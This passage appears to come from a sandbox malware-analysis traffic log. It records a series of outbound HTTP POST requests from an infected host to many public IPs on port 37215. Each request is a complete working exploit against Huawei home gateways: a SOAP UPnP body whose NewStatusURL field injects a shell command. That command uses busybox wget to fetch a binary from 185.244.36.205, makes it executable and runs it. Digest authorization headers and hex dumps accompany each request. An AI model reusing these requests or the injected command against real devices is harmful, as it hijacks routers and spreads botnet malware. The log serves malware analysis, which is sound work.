                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1930192.168.2.1533596102.116.249.1137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.079377890 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1931192.168.2.154501894.151.95.2637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.079834938 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1932192.168.2.155341241.161.238.7737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.079842091 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1933192.168.2.156090694.49.8.24837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.079843998 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1934192.168.2.153401441.255.168.3837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.079854965 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1935192.168.2.1537728186.240.212.4937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.080020905 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1936192.168.2.1560410190.252.229.17437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.080120087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1937192.168.2.1557330222.225.147.13237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.080569029 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1938192.168.2.154842637.60.91.10737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.080569029 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1939192.168.2.1555086197.217.112.4637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.080702066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1940192.168.2.154060245.50.17.11737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.080805063 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
